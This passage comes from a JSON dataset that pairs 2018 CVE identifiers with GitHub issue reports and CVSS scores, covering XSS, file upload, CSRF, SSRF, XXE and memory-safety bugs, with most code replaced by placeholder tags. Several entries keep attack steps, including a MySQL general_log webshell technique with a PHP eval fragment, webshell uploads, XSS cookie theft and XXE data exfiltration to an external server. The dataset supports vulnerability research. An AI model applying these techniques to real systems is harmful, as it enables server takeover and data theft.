  27680. "CVE_ID": "CVE-2018-18873",
  27681. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/184",
  27682. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/184",
  27683. "Repo_new": "jasper-software/jasper",
  27684. "Issue_Created_At": "2018-10-31T06:55:17Z",
  27685. "description": "NULL pointer dereference was discovered. An issue was discovered in Jasper NUMBERTAG There is a NULL pointer dereference at function ras_putdatastd CODETAG At the site of data define , the value of \"numcmpts\" is NUMBERTAG ERRORTAG FILETAG",
  27686. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  27687. "severity": "MEDIUM",
  27688. "baseScore": 5.5,
  27689. "impactScore": 3.6,
  27690. "exploitabilityScore": 1.8
  27691. },
  27692. {
  27693. "CVE_ID": "CVE-2018-18874",
  27694. "Issue_Url_old": "https://github.com/gnat/nc-cms/issues/11",
  27695. "Issue_Url_new": "https://github.com/gnat/nc-cms/issues/11",
  27696. "Repo_new": "gnat/nc-cms",
  27697. "Issue_Created_At": "2018-10-31T07:07:54Z",
  27698. "description": "There is an upload vulnerability in the edit html that can upload any files(eg:php webshell). Hello, I found that this cms may have some security problem you can edit your html on URLTAG and you can upload any evil file js you want NUMBERTAG click \"upfile or image\" FILETAG NUMBERTAG select a php file (eg: a evil webshell) FILETAG upload success! FILETAG the path: PATHTAG webshell : FILETAG FILETAG login webshell FILETAG FILETAG",
  27699. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27700. "severity": "CRITICAL",
  27701. "baseScore": 9.8,
  27702. "impactScore": 5.9,
  27703. "exploitabilityScore": 3.9
  27704. },
  27705. {
  27706. "CVE_ID": "CVE-2018-18888",
  27707. "Issue_Url_old": "https://github.com/Leslie1sMe/laravelCMS/issues/4",
  27708. "Issue_Url_new": "https://github.com/leslie1sme/laravelcms/issues/4",
  27709. "Repo_new": "Leslie1sMe/laravelCMS",
  27710. "Issue_Created_At": "2018-10-30T15:19:58Z",
  27711. "description": "There are a File upload vulnerability allows attackers to upload PHP back door files. Vulnerability code at PATHTAG at line NUMBERTAG ERRORTAG The program uses some unreliable functions to judge whether it is a picture file or not. But the problem is Users can modify file attributes by truncating data. fix suggestion NUMBERTAG usr APITAG or \"===\"compare with file extension name APITAG files when saving files. The naming rule of file names uses time stamp to splice the MD5 value of random APITAG",
  27712. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27713. "severity": "CRITICAL",
  27714. "baseScore": 9.8,
  27715. "impactScore": 5.9,
  27716. "exploitabilityScore": 3.9
  27717. },
  27718. {
  27719. "CVE_ID": "CVE-2018-18909",
  27720. "Issue_Url_old": "https://github.com/yaniswang/xhEditor/issues/37",
  27721. "Issue_Url_new": "https://github.com/yaniswang/xheditor/issues/37",
  27722. "Repo_new": "yaniswang/xheditor",
  27723. "Issue_Created_At": "2018-11-03T04:57:52Z",
  27724. "description": "XSS vulnerability in source code view. The editor's source code view allows attacker to bypass the input validation in default view by injecting javascript using IFRAME element. Proof of Concept: Injected the the payload APITAG APITAG into the editor's source code view.",
  27725. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27726. "severity": "MEDIUM",
  27727. "baseScore": 6.1,
  27728. "impactScore": 2.7,
  27729. "exploitabilityScore": 2.8
  27730. },
  27731. {
  27732. "CVE_ID": "CVE-2018-18915",
  27733. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/511",
  27734. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/511",
  27735. "Repo_new": "exiv2/exiv2",
  27736. "Issue_Created_At": "2018-11-02T07:43:09Z",
  27737. "description": "Infinite loop in APITAG function of APITAG The issue may be similar to the issue NUMBERTAG with the POC file provided, The value of the start will always be APITAG , so the condition will be true all the time. APITAG or the command APITAG can trigger the situation: CODETAG",
  27738. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  27739. "severity": "MEDIUM",
  27740. "baseScore": 6.5,
  27741. "impactScore": 3.6,
  27742. "exploitabilityScore": 2.8
  27743. },
  27744. {
  27745. "CVE_ID": "CVE-2018-18919",
  27746. "Issue_Url_old": "https://github.com/JaxsonWang/WP-Editor.md/issues/275",
  27747. "Issue_Url_new": "https://github.com/lurenjiasworld/wp-editor.md/issues/275",
  27748. "Repo_new": "lurenjiasworld/wp-editor.md",
  27749. "Issue_Created_At": "2018-10-31T08:42:01Z",
  27750. "description": "WP FILETAG exists XSS vulnerability. Vulnerability description When commentaries open markdown, administrators and editor roles can trigger XSS. Proof of concept First, open the comment area markdown \u63d2\u4ef6(plug in) APITAG NUMBERTAG md]( FILETAG FILETAG APITAG checked APITAG APITAG FILETAG FILETAG APITAG Second, log in with the administrator or editor role and comment in the comment APITAG payload used is: >[ FILETAG \"> APITAG alert NUMBERTAG APITAG FILETAG \"> APITAG alert NUMBERTAG APITAG Third, visit the comment page. You will find that the page has successfully executed the JS code NUMBERTAG URLTAG FILETAG NUMBERTAG Exploit Deploying FILETAG on attacker FILETAG content is the JS code you want to execute. >[ FILETAG \"> APITAG APITAG FILETAG \"> APITAG alert NUMBERTAG APITAG Test using JS code that gets cookie NUMBERTAG URLTAG FILETAG NUMBERTAG Successfully acquire part of cookie XD",
  27751. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27752. "severity": "MEDIUM",
  27753. "baseScore": 4.8,
  27754. "impactScore": 2.7,
  27755. "exploitabilityScore": 1.7
  27756. },
  27757. {
  27758. "CVE_ID": "CVE-2018-18920",
  27759. "Issue_Url_old": "https://github.com/ethereum/py-evm/issues/1448",
  27760. "Issue_Url_new": "https://github.com/ethereum/py-evm/issues/1448",
  27761. "Repo_new": "ethereum/py-evm",
  27762. "Issue_Created_At": "2018-11-01T07:53:25Z",
  27763. "description": "Invalid values like NUMBERTAG occurs in Stack during the execution.. What is wrong? When we executing our contract via py evm, we find there are strange values occur in stack, and they cause the execution ended in INVALID opcode. just run APITAG with default settings, and the APITAG output APITAG : \"stack NUMBERTAG the correct value should be byte str like b'\\x' Just want to ask if someone has already figured out this issue and what are the main concerns here. Thanks a lot.",
  27764. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27765. "severity": "HIGH",
  27766. "baseScore": 8.8,
  27767. "impactScore": 5.9,
  27768. "exploitabilityScore": 2.8
  27769. },
  27770. {
  27771. "CVE_ID": "CVE-2018-18921",
  27772. "Issue_Url_old": "https://github.com/phpservermon/phpservermon/issues/670",
  27773. "Issue_Url_new": "https://github.com/phpservermon/phpservermon/issues/670",
  27774. "Repo_new": "phpservermon/phpservermon",
  27775. "Issue_Created_At": "2018-10-30T15:37:17Z",
  27776. "description": "[SECURITY] Discovered vulnerability. Hi, Please, how can I report a vulnerability? regards",
  27777. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  27778. "severity": "MEDIUM",
  27779. "baseScore": 6.5,
  27780. "impactScore": 3.6,
  27781. "exploitabilityScore": 2.8
  27782. },
  27783. {
  27784. "CVE_ID": "CVE-2018-18925",
  27785. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5469",
  27786. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5469",
  27787. "Repo_new": "gogs/gogs",
  27788. "Issue_Created_At": "2018-10-22T08:02:47Z",
  27789. "description": "gogs remote command execution. Gogs version (or commit ref): newest( URLTAG Can you reproduce the bug at FILETAG [ x] Yes (provide example URL) [ ] No [ ] Not relevant Description I can login to arbitrary account. And when I logged in as admin, I can execute any command by git hooks. I just tried login to Unknown's account but do not perform command execution. APITAG APITAG As this is a very severe issue, I won't post details here. MENTIONTAG can you give me your email address and I send the details to you?",
  27790. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27791. "severity": "CRITICAL",
  27792. "baseScore": 9.8,
  27793. "impactScore": 5.9,
  27794. "exploitabilityScore": 3.9
  27795. },
  27796. {
  27797. "CVE_ID": "CVE-2018-18926",
  27798. "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/5140",
  27799. "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/5140",
  27800. "Repo_new": "go-gitea/gitea",
  27801. "Issue_Created_At": "2018-10-22T15:14:26Z",
  27802. "description": "gitea remote command execution with default installation. Gitea version (or commit ref): current ( URLTAG Can you reproduce the bug at FILETAG [ ] Yes (provide example URL) [ x] No [ ] Not relevant Description Hi, I found a issue just like URLTAG With gitea's default installation, I can authenticate as arbitrary account. But due to some server configuration, I can't reproduce in FILETAG . As this is a very severe issue, I won't post details here. Can you give me your email address and I send the details to you?",
  27803. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27804. "severity": "CRITICAL",
  27805. "baseScore": 9.8,
  27806. "impactScore": 5.9,
  27807. "exploitabilityScore": 3.9
  27808. },
  27809. {
  27810. "CVE_ID": "CVE-2018-18934",
  27811. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/13",
  27812. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/13",
  27813. "Repo_new": "popojicms/popojicms",
  27814. "Issue_Created_At": "2018-10-30T15:07:52Z",
  27815. "description": "I found a CSRF vulnerability that can getshell. ERRORTAG \u540e\u53f0\u4e0a\u4f20\u9875\u9762\u5e76\u6ca1\u6709CSRF\u9632\u62a4\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u6784\u9020poc ERRORTAG \u7136\u540e\u53d1\u9001\u7ed9\u7ba1\u7406\u5458\u94fe\u63a5\uff0c\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5getshell.",
  27816. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27817. "severity": "CRITICAL",
  27818. "baseScore": 9.8,
  27819. "impactScore": 5.9,
  27820. "exploitabilityScore": 3.9
  27821. },
  27822. {
  27823. "CVE_ID": "CVE-2018-18934",
  27824. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/12",
  27825. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/12",
  27826. "Repo_new": "popojicms/popojicms",
  27827. "Issue_Created_At": "2018-10-30T15:06:29Z",
  27828. "description": "I found that the background can getshell. Background GETCHELL Description: The background can upload a compressed package, uncompressed without filtering, and getshell. Put a webshell in the archive and upload it. APITAG FILETAG Then we can access the corresponding directory to getshell. Code analysis See line NUMBERTAG of FILETAG ERRORTAG Only judge whether the upload is a zip archive, if it is directly decompressed, the directory to be extracted is APITAG",
  27829. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27830. "severity": "CRITICAL",
  27831. "baseScore": 9.8,
  27832. "impactScore": 5.9,
  27833. "exploitabilityScore": 3.9
  27834. },
  27835. {
  27836. "CVE_ID": "CVE-2018-18935",
  27837. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/14",
  27838. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/14",
  27839. "Repo_new": "popojicms/popojicms",
  27840. "Issue_Created_At": "2018-10-30T15:09:18Z",
  27841. "description": "I found a CSRF vulnerability that can add a super administrator account directly. ERRORTAG APITAG CODETAG \u540e\u53f0\u4efb\u610f\u6587\u4ef6\u5220\u9664",
  27842. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27843. "severity": "HIGH",
  27844. "baseScore": 8.8,
  27845. "impactScore": 5.9,
  27846. "exploitabilityScore": 2.8
  27847. },
  27848. {
  27849. "CVE_ID": "CVE-2018-18936",
  27850. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/15",
  27851. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/15",
  27852. "Repo_new": "popojicms/popojicms",
  27853. "Issue_Created_At": "2018-10-30T15:10:54Z",
  27854. "description": "I found a background arbitrary file deletion vulnerability. ERRORTAG Vulnerability analysis: Look at line NUMBERTAG of the code FILETAG ERRORTAG You can see that you want to delete the image. If it is not the image, it will be deleted. Then we can delete any file across the directory.",
  27855. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  27856. "severity": "HIGH",
  27857. "baseScore": 7.5,
  27858. "impactScore": 3.6,
  27859. "exploitabilityScore": 3.9
  27860. },
  27861. {
  27862. "CVE_ID": "CVE-2018-18937",
  27863. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/82",
  27864. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/82",
  27865. "Repo_new": "mz-automation/libiec61850",
  27866. "Issue_Created_At": "2018-11-03T06:19:20Z",
  27867. "description": "SEGV in function APITAG I used gcc NUMBERTAG and APITAG ( APITAG before make ) to build libiec NUMBERTAG URLTAG . First, I run the APITAG in directory APITAG by command APITAG so that the server is set up. Then I tested APITAG in directory APITAG by command APITAG . But I got SEGV in function APITAG in APITAG . This is the ASAN information: ERRORTAG",
  27868. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  27869. "severity": "HIGH",
  27870. "baseScore": 7.5,
  27871. "impactScore": 3.6,
  27872. "exploitabilityScore": 3.9
  27873. },
  27874. {
  27875. "CVE_ID": "CVE-2018-18939",
  27876. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/159",
  27877. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/159",
  27878. "Repo_new": "wuzhicms/wuzhicms",
  27879. "Issue_Created_At": "2018-11-01T03:32:16Z",
  27880. "description": "There is a stored xss vulnerability. An issue was discovered in wuzhicms NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG and view homepage FILETAG",
  27881. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  27882. "severity": "MEDIUM",
  27883. "baseScore": 4.8,
  27884. "impactScore": 2.7,
  27885. "exploitabilityScore": 1.7
  27886. },
  27887. {
  27888. "CVE_ID": "CVE-2018-18942",
  27889. "Issue_Url_old": "https://github.com/baserproject/basercms/issues/959",
  27890. "Issue_Url_new": "https://github.com/baserproject/basercms/issues/959",
  27891. "Repo_new": "baserproject/basercms",
  27892. "Issue_Created_At": "2018-09-19T02:43:04Z",
  27893. "description": "Code Execution Vulnerability. Hello\uff1a I found an arbitrary file upload vulnerability in basercms. Can lead to remote code execution. Can you provide an email address? I will give you my report. thank you!",
  27894. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  27895. "severity": "HIGH",
  27896. "baseScore": 7.2,
  27897. "impactScore": 5.9,
  27898. "exploitabilityScore": 1.2
  27899. },
  27900. {
  27901. "CVE_ID": "CVE-2018-18950",
  27902. "Issue_Url_old": "https://github.com/kindsoft/kindeditor/issues/289",
  27903. "Issue_Url_new": "https://github.com/kindsoft/kindeditor/issues/289",
  27904. "Repo_new": "kindsoft/kindeditor",
  27905. "Issue_Created_At": "2018-11-02T09:57:46Z",
  27906. "description": "Path Traversal vulnerability in APITAG ver NUMBERTAG Hello, The APITAG NUMBERTAG have path traversal vulnerability specifically in PATHTAG Anyone can browse the file or directory in PATHTAG folder via \u201cpath\u201d parameter without authentication. Through this method the unauthorized user can quickly view on the target host all uploaded files and exposed sensitive information. Example NUMBERTAG URLTAG FILETAG NUMBERTAG URLTAG FILETAG NUMBERTAG URLTAG FILETAG",
  27907. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  27908. "severity": "HIGH",
  27909. "baseScore": 7.5,
  27910. "impactScore": 3.6,
  27911. "exploitabilityScore": 3.9
  27912. },
  27913. {
  27914. "CVE_ID": "CVE-2018-18957",
  27915. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/83",
  27916. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/83",
  27917. "Repo_new": "mz-automation/libiec61850",
  27918. "Issue_Created_At": "2018-11-05T18:08:57Z",
  27919. "description": "Stack smashing. Summary A stack smashing was detected in FILETAG Steps to reproduce ERRORTAG APITAG URLTAG APITAG file will be expired after NUMBERTAG days.] Debugging ERRORTAG",
  27920. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27921. "severity": "CRITICAL",
  27922. "baseScore": 9.8,
  27923. "impactScore": 5.9,
  27924. "exploitabilityScore": 3.9
  27925. },
  27926. {
  27927. "CVE_ID": "CVE-2018-18980",
  27928. "Issue_Url_old": "https://github.com/x-f1v3/ForCve/issues/5",
  27929. "Issue_Url_new": "https://github.com/x-f1v3/forcve/issues/5",
  27930. "Repo_new": "x-f1v3/forcve",
  27931. "Issue_Created_At": "2018-10-30T15:13:45Z",
  27932. "description": "Zoho APITAG Network Configuration Manager NUMBERTAG E vulnerability. Zoho APITAG Network Configuration Manager NUMBERTAG E vulnerability Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: jacky xing From APITAG Exploit Author's Email: jacky. EMAILTAG .cn A XML External Entity injection(XXE) vulnerability exists in Zoho APITAG Network Configuration Manager NUMBERTAG ia the APITAG parameter in a APITAG GET request. My vps\u2019s FILETAG APITAG FILETAG I used the Ftp protocol to read file, it can read the file FILETAG . The FILETAG is just for test. FILETAG Then i used the poc to request my vps\u2019s FILETAG . APITAG The vulnerability exists in the APITAG ,so i tested it by the poc which was urlencoded. CODETAG In my vps ,i used the python script to open ftp protocol for accepting data FILETAG When i sent the request , I accepted the content of FILETAG in my vps. FILETAG FILETAG",
  27933. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  27934. "severity": "HIGH",
  27935. "baseScore": 7.5,
  27936. "impactScore": 3.6,
  27937. "exploitabilityScore": 3.9
  27938. },
  27939. {
  27940. "CVE_ID": "CVE-2018-19044",
  27941. "Issue_Url_old": "https://github.com/acassen/keepalived/issues/1048",
  27942. "Issue_Url_new": "https://github.com/acassen/keepalived/issues/1048",
  27943. "Repo_new": "acassen/keepalived",
  27944. "Issue_Created_At": "2018-10-25T15:14:03Z",
  27945. "description": "Dbus interface allows overwriting arbitrary files and insecure permissions are used. Users can overwrite arbitrary files if APITAG or APITAG is invoked and fs.protected_symlinks is NUMBERTAG Reproducer: user: johannes APITAG NUMBERTAG tl:~> ls lah /passwd rw r r NUMBERTAG root root NUMBERTAG K Oct NUMBERTAG passwd johannes APITAG NUMBERTAG tl:~> head n NUMBERTAG passwd APITAG jobs PATHTAG johannes APITAG NUMBERTAG tl:~> ln s /passwd APITAG root: fs.protected_symlinks NUMBERTAG busctl call APITAG PATHTAG APITAG APITAG head n1 /passwd < Global definitions > APITAG and APITAG is also created mode NUMBERTAG so information can leak/be modified to/by unprivileged users",
  27946. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N",
  27947. "severity": "MEDIUM",
  27948. "baseScore": 4.7,
  27949. "impactScore": 3.6,
  27950. "exploitabilityScore": 1.0
  27951. },
  27952. {
  27953. "CVE_ID": "CVE-2018-19047",
  27954. "Issue_Url_old": "https://github.com/mpdf/mpdf/issues/867",
  27955. "Issue_Url_new": "https://github.com/mpdf/mpdf/issues/867",
  27956. "Repo_new": "mpdf/mpdf",
  27957. "Issue_Created_At": "2018-09-26T12:41:37Z",
  27958. "description": "hello,I find a security bug of mpdf. Hello, when I was do some security test. I found a vulnerability that may lead to ssrf of the server which host a html2pdf service with mPDF. The poc is as follow: APITAG APITAG world! APITAG '); $mpdf APITAG APITAG APITAG '); $mpdf APITAG the another server APITAG will get a request from above In real scenario the poc may be sent from font end . so attacker will send this to server side and trigger a SSRF bug which may lead to attack private network mPDF version NUMBERTAG OS:UBUNTU NUMBERTAG",
  27959. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  27960. "severity": "CRITICAL",
  27961. "baseScore": 10.0,
  27962. "impactScore": 6.0,
  27963. "exploitabilityScore": 3.9
  27964. },
  27965. {
  27966. "CVE_ID": "CVE-2018-19053",
  27967. "Issue_Url_old": "https://github.com/Pbootcms/Pbootcms/issues/2",
  27968. "Issue_Url_new": "https://github.com/pbootcms/pbootcms/issues/2",
  27969. "Repo_new": "pbootcms/pbootcms",
  27970. "Issue_Created_At": "2018-11-06T12:59:30Z",
  27971. "description": "Pbootcms NUMBERTAG background execution sql statement getshell vulnerability, database management module + mysql GLOBAL general_log. There is a getshell vulnerability here, the integrated database management module executes the sql statement + mysql GLOBAL general_log APITAG version NUMBERTAG APITAG default database is sqlite. For testing convenience, we need to replace the default database with the mysql database. the mysql database directory: PATHTAG APITAG FILETAG in the browser and enter the account password to enter the background.. username=admin password NUMBERTAG FILETAG URLTAG Can get the absolute path of the server FILETAG PATHTAG Database management module URLTAG FILETAG Here you can enter any sql statement\uff0c Use mysql GLOBAL general_log write webshell NUMBERTAG SET GLOBAL general_log = 'On'; FILETAG APITAG the log file path SET GLOBAL general_log_file = PATHTAG FILETAG APITAG a select statement with a sentence webshell select <?php eval($_POST FILETAG FILETAG FILETAG The webshell has been written to the log file FILETAG Connect to webshell using china chopper FILETAG APITAG write to webshell via export file\uff0c because mysql defaults to secure file priv",
  27972. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  27973. "severity": "HIGH",
  27974. "baseScore": 7.2,
  27975. "impactScore": 5.9,
  27976. "exploitabilityScore": 1.2
  27977. },
  27978. {
  27979. "CVE_ID": "CVE-2018-19056",
  27980. "Issue_Url_old": "https://github.com/pandao/editor.md/issues/634",
  27981. "Issue_Url_new": "https://github.com/pandao/editor.md/issues/634",
  27982. "Repo_new": "pandao/editor.md",
  27983. "Issue_Created_At": "2018-11-07T07:36:54Z",
  27984. "description": "XSS vulnerability in APITAG label . this APITAG label will cause dom based XSS. if you type APITAG FILETAG which will create a link. when a user clicks it, it will send information to the attacker.",
  27985. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27986. "severity": "MEDIUM",
  27987. "baseScore": 6.1,
  27988. "impactScore": 2.7,
  27989. "exploitabilityScore": 2.8
  27990. },
  27991. {
  27992. "CVE_ID": "CVE-2018-19057",
  27993. "Issue_Url_old": "https://github.com/sparksuite/simplemde-markdown-editor/issues/721",
  27994. "Issue_Url_new": "https://github.com/sparksuite/simplemde-markdown-editor/issues/721",
  27995. "Repo_new": "sparksuite/simplemde-markdown-editor",
  27996. "Issue_Created_At": "2018-11-07T08:08:10Z",
  27997. "description": "there was a xss both in img and a label. when We enter some strings,such as: ERRORTAG or you can use APITAG The editor will execute XSS payload When others use this editor, it is easy to get administrator rights by using XSS attack.",
  27998. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27999. "severity": "MEDIUM",
  28000. "baseScore": 6.1,
  28001. "impactScore": 2.7,
  28002. "exploitabilityScore": 2.8
  28003. },
  28004. {
  28005. "CVE_ID": "CVE-2018-19089",
  28006. "Issue_Url_old": "https://github.com/xujeff/tianti/issues/27",
  28007. "Issue_Url_new": "https://github.com/xujeff/tianti/issues/27",
  28008. "Repo_new": "xujeff/tianti",
  28009. "Issue_Created_At": "2018-11-07T13:57:07Z",
  28010. "description": "There are some XSS flaws in your project. Hello\uff0cguy\uff0ci'm sorry to tell you that your project has so many XSS flaws. first of all,the userlist module exists a storage type XSS\uff0cwhich will cause cookie Disclosure and Escalation of Privileges. the following picture is the proof of this flaws\uff1a FILETAG FILETAG the following is the descripment of this flaws according to the leak of the code. FILETAG the path of this pice of code is PATHTAG FILETAG received the value from \"controller\" and displace it without any defensive measures. that check the check the code of the \"controller\". here is the usercontroller,and we can get the request parameters from users FILETAG and it put the userinfo to the User APITAG object will be return to the \"view\",by ajax method. and we can see,there doesn't exits any defensive measures. FILETAG and secondly, in the article management mudle,there also exists a storage type xss. the following picture is the proof of this flaws: FILETAG and the following the is entry of the flaws FILETAG and thirdly,in the usermanagement mudle,there exists a reflect xss. this functional mudle is created to check the userinfo through the keyword of the user entered. FILETAG Hope you guy fix the flaws quickly,if you have some questions,please contact me with the following e mail address: EMAILTAG",
  28011. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  28012. "severity": "MEDIUM",
  28013. "baseScore": 5.4,
  28014. "impactScore": 2.7,
  28015. "exploitabilityScore": 2.3
  28016. },
  28017. {
  28018. "CVE_ID": "CVE-2018-19092",
  28019. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/7",
  28020. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/7",
  28021. "Repo_new": "yzmcms/yzmcms",
  28022. "Issue_Created_At": "2018-11-07T12:19:43Z",
  28023. "description": "yzmcms NUMBERTAG SS. FILETAG XSS payload: URLTAG POC: GET PATHTAG NUMBERTAG c NUMBERTAG fscript NUMBERTAG er6qt NUMBERTAG HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Referer: FILETAG Cookie: APITAG FILETAG",
  28024. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  28025. "severity": "MEDIUM",
  28026. "baseScore": 6.1,
  28027. "impactScore": 2.7,
  28028. "exploitabilityScore": 2.8
  28029. },
  28030. {
  28031. "CVE_ID": "CVE-2018-19093",
  28032. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/84",
  28033. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/84",
  28034. "Repo_new": "mz-automation/libiec61850",
  28035. "Issue_Created_At": "2018-11-07T16:41:29Z",
  28036. "description": "SEGV in function APITAG. I used gcc NUMBERTAG and APITAG ( APITAG before make ) to build libiec NUMBERTAG URLTAG . First, I ran the APITAG in directory APITAG with the command APITAG so that the server is set up. Then I tested APITAG in directory APITAG with the command APITAG, but I got a SEGV in function APITAG in APITAG . This is the ASAN output: ERRORTAG",
  28037. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  28038. "severity": "HIGH",
  28039. "baseScore": 7.5,
  28040. "impactScore": 3.6,
  28041. "exploitabilityScore": 3.9
  28042. },
  28043. {
  28044. "CVE_ID": "CVE-2018-19104",
  28045. "Issue_Url_old": "https://github.com/bagesoft/bagecms/issues/3",
  28046. "Issue_Url_new": "https://github.com/bagesoft/bagecms/issues/3",
  28047. "Repo_new": "bagesoft/bagecms",
  28048. "Issue_Created_At": "2018-11-08T01:51:36Z",
  28049. "description": "There is a CSRF vulnerability that can be used to upload arbitrary files and gain server privileges. FILETAG While the administrator is logged in, open the following (PoC). APITAG APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  28050. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  28051. "severity": "HIGH",
  28052. "baseScore": 8.8,
  28053. "impactScore": 5.9,
  28054. "exploitabilityScore": 2.8
  28055. },
  28056. {
  28057. "CVE_ID": "CVE-2018-19107",
  28058. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/427",
  28059. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/427",
  28060. "Repo_new": "exiv2/exiv2",
  28061. "Issue_Created_At": "2018-09-01T05:37:20Z",
  28062. "description": "APITAG heap buffer overflow at APITAG. When running APITAG ( NUMBERTAG c6f) against crafted PSD files, ASAN reports a heap-buffer-overflow. PoCs: URLTAG URLTAG ASAN output: ERRORTAG",
  28063. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28064. "severity": "MEDIUM",
  28065. "baseScore": 6.5,
  28066. "impactScore": 3.6,
  28067. "exploitabilityScore": 2.8
  28068. },
  28069. {
  28070. "CVE_ID": "CVE-2018-19108",
  28071. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/426",
  28072. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/426",
  28073. "Repo_new": "exiv2/exiv2",
  28074. "Issue_Created_At": "2018-08-31T13:49:18Z",
  28075. "description": "Infinite loop inside APITAG APITAG. There seems to be an infinite loop inside APITAG at URLTAG ( NUMBERTAG c6f3). It checks APITAG at line NUMBERTAG, and APITAG is updated at line NUMBERTAG. However, APITAG may sometimes be NUMBERTAG fffffff4, which makes the subtraction have no effect, so the loop condition never becomes false. A concrete input that triggers this is available here: URLTAG .",
  28076. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28077. "severity": "MEDIUM",
  28078. "baseScore": 6.5,
  28079. "impactScore": 3.6,
  28080. "exploitabilityScore": 2.8
  28081. },
  28082. {
  28083. "CVE_ID": "CVE-2018-19109",
  28084. "Issue_Url_old": "https://github.com/xujeff/tianti/issues/29",
  28085. "Issue_Url_new": "https://github.com/xujeff/tianti/issues/29",
  28086. "Repo_new": "xujeff/tianti",
  28087. "Issue_Created_At": "2018-11-07T16:33:35Z",
